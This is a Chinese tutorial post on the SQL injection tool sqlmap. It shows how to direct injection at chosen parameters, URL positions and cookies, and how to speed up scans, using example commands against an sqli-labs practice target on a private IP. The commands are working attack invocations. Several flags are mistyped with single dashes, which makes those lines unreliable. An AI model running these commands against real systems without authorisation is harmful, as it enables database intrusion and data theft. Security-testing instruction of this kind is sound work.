注入工具sqlmap如何指定位置注入和优化性能

注入工具sqlmap如何指定位置注入和优化性能，相信很多没有经验的人对此束手无策，为此本文总结了问题出现的原因和解决方法，通过这篇文章希望你能解决这个问题。

一、指定位置注入

1、-p，指定具体探测的参数

sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1 -p id --dbs 对id进行探测

sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1&&name=2 -p "id,name" --dbs 对id和name都进行探测

2、-skip，忽略探测的参数

sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1&&name=2 --level 5 --skip host --dbs 5级对所有存在的注入点进行探测，这里忽略了host

3、-param-exclude，忽略包含具体内容的参数

-param-exclude="id|name"

4、-skip-static 忽略非动态参数

5、用"*"指定注入位置,

sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1*&&name=2*&&tab=3 --dbs

sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1&&name=2&&tab=3 --cookie="un=adm*;pw=adm"-dbs

sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1&&name=2&&tab=3 --cookie="*"-dbs

二、优化性能

1、设置连接为持久连接

http报文中设置Connection:Keep-Alive

sqlmap中加参数 --keep-alive

2、设置不接受http当中的body，常用在盲注

-null-connection

3、设置多线程

-thread 默认是1个线程，最大线程为10

4、预测输出

-predict-output，不能与thread同时用

5、开启所有优化

-o

看完上述内容，你们掌握注入工具sqlmap如何指定位置注入和优化性能的方法了吗？如果还想学到更多技能或想了解更多相关内容，欢迎关注行业资讯频道，感谢各位的阅读！